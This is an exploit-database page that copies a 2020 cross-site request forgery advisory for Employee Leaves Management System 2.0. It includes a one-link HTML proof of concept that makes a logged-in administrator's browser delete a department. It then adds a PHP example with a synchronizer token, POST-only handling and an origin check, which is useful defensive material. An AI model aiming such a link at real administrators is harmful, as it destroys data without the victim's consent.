Employee Leaves Management System 2.0 Cross Site Request Forgery

CVE: N/A
Category: CWE-352 (Cross-Site Request Forgery)
Price: N/A
Severity: High
Author: Unknown
Risk: High
Exploitation type: Remote
Date: 2020-01-27
CPE: cpe:/a:employee-leaves-management-system:2.0
CVSS: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H
EPSS: 0.02192
EPSS percentile: 0.50148

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020010204

Below is a copy:

# Exploit Title: Employee Leaves Management System 2.0 Cross-Site Request Forgery
# Date: 22-01-2020
# Author: Priyanka Samak
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/employee-leaves-management-system-elms/
# Software: Employee Leaves Management System
# Version : 2.0
# Tested on Windows 10
# Vulnerability Type: Cross-Site Request Forgery
# Cross-Site Request Forgery is an attack in which an attacker tricks a
# victim's browser into sending requests the victim did not intend, so that
# state-changing actions are performed with the victim's authenticated session.
# 1. Description
# The vulnerability exists because the "admin/managedepartments.php" script
# does not verify the source of the HTTP request: it carries out the delete
# on a plain GET request and relies only on the session cookie, which the
# browser attaches automatically to any request for that site, cross-site or
# not. An attacker who gets a logged-in administrator to open a malicious
# page or click a link can therefore delete arbitrary departments on the
# administrator's behalf (a forged state change, not code execution).
# 2. Proof of Concept: the following page, served from an attacker-controlled
# origin, makes the victim's browser send the crafted GET request that deletes
# the department with id 6 (a sample id; the attacker picks the value).
<html>
<body>
<!-- Clicking the link sends GET /elms/admin/managedepartments.php?del=6
     with the victim's ELMS session cookie attached by the browser. -->
<a class="button" href="http://localhost/elms/admin/managedepartments.php?del=6">Click Me!</a>
</body>
</html>
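The fix belongs in the PHP handler, not in the browser. The following is an added example, not code from the original advisory or from the ELMS project: it shows the vulnerable pattern the advisory describes beside a hardened version of the delete action (POST only, a per-session synchronizer token compared with hash_equals, and an Origin/Referer check as defence in depth). The mysqli connection $con, the table name tbldepartments with its id column, and the expected origin http://localhost are assumptions made for illustration.

```php
<?php
// Added example (not the ELMS project's own code): CSRF-hardened
// department delete for admin/managedepartments.php.
// Assumed: $con is an open mysqli connection; table tbldepartments,
// primary key id; the application is served from http://localhost.
session_start();

// 1. One synchronizer token per session, from a CSPRNG.
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

function csrf_token_valid(?string $submitted): bool
{
    // hash_equals() compares in constant time; null or a wrong value fails.
    return is_string($submitted)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

function same_origin_request(string $expected): bool
{
    // A request forged from attacker-controlled page carries that page's
    // Origin (or Referer), never ours. Requests with neither header are
    // rejected here because this is a destructive action.
    $origin = $_SERVER['HTTP_ORIGIN'] ?? null;
    if ($origin === null && isset($_SERVER['HTTP_REFERER'])) {
        $p = parse_url($_SERVER['HTTP_REFERER']);
        if ($p !== false && isset($p['scheme'], $p['host'])) {
            $origin = $p['scheme'] . '://' . $p['host']
                    . (isset($p['port']) ? ':' . $p['port'] : '');
        }
    }
    return $origin === $expected;
}

// 2. Vulnerable pattern (what the advisory describes): a state change on
//    GET, authenticated only by the cookie the browser sends automatically.
//    Shown commented out so the file runs only the hardened path.
// if (isset($_GET['del'])) {
//     $con->query('DELETE FROM tbldepartments WHERE id=' . (int) $_GET['del']);
// }

// 3. Hardened pattern: POST only, token required, origin checked.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['del'])) {
    if (!csrf_token_valid($_POST['csrf_token'] ?? null)
        || !same_origin_request('http://localhost')) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token');
    }
    $stmt = $con->prepare('DELETE FROM tbldepartments WHERE id = ?');
    if ($stmt === false) {
        http_response_code(500);
        exit('Database error');
    }
    $id = (int) $_POST['del'];
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->close();
    header('Location: managedepartments.php');
    exit;
}
?>
<!-- The delete now needs a form carrying the session token; a cross-site
     <a href> or <img src> cannot read or supply it. -->
<form method="post" action="managedepartments.php">
    <input type="hidden" name="csrf_token"
           value="<?= htmlspecialchars($_SESSION['csrf_token'], ENT_QUOTES, 'UTF-8') ?>">
    <input type="hidden" name="del" value="6">
    <button type="submit" class="button">Delete department</button>
</form>
```

The token is the primary control; the Origin/Referer check only adds depth, and because some privacy configurations strip both headers it should be limited to sensitive actions like this one. Setting the session cookie with SameSite=Lax or Strict would block the advisory's GET-link PoC in current browsers as well, but it is not a substitute for the token on POST handlers.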

Copyright ©2024 Exploitalert.
